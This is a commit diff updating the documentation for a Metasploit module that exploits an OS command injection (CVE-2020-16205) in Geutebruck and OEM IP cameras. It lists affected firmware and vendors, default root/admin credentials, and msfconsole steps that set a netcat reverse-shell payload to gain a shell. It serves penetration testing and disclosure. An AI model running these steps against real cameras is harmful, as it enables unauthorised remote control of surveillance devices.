Update geutebruck_testaction_exec.md
it should be better now :)
This commit is contained in:
ddouhine
gwillcox-r7
parent
a14a2fe8d2
commit
e4f760691e
|
|
@ -1,6 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
|
||||
The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
|
||||
Encoder and E2 Series Camera models:
|
||||
G-Code:
|
||||
EEC-2xxx
|
||||
G-Cam:
|
||||
|
|
@ -9,33 +10,48 @@ G-Cam:
|
|||
ETHC-22xx
|
||||
EWPC-22xx
|
||||
|
||||
Many brands use the same firmware:
|
||||
UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||
Ganz
|
||||
Visualint
|
||||
Cap
|
||||
THRIVE Intelligence
|
||||
Sophus
|
||||
VCA
|
||||
TripCorps
|
||||
Sprinx Technologies
|
||||
Smartec
|
||||
Riva
|
||||
|
||||
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
|
||||
|
||||
### Description
|
||||
|
||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
||||
Tested it with the 1.12.14.5 firmware only.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
List the steps needed to make sure this thing works
|
||||
|
||||
1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
||||
2. Do: `set httpusername root`
|
||||
3. Do: `set httppassword admin`
|
||||
4. Do: `set lhost 192.168.14.1`
|
||||
5. Do: `set rhosts 192.168.14.58`
|
||||
1. Start the camera using default configuration
|
||||
2. Launch msfconsole
|
||||
3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
||||
4. Do: `set httpusername root`
|
||||
5. Do: `set httppassword admin`
|
||||
6. Do: `set lhost <metasploit_ip>`
|
||||
5. Do: `set rhosts <camera_ip>`
|
||||
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
||||
7. Do: `check`
|
||||
7. Do: `check` to be sure the target is vulnerable
|
||||
8. Do: `exploit`
|
||||
9. You should get a shell
|
||||
|
||||
## Options
|
||||
|
||||
### HTTPUSERNAME
|
||||
The default credentials to log on the web interface are root/admin.
|
||||
|
||||
### HTTPUSERNAME
|
||||
A username used to authenticate on the admin page. **Default: root**
|
||||
|
||||
### HTTPPASSWORD
|
||||
|
||||
The password of the username used to authenticate on the admin page. **Default: admin**
|
||||
|
||||
## Scenarios
|
||||
|
|
|
|||
Loading…
Reference in New Issue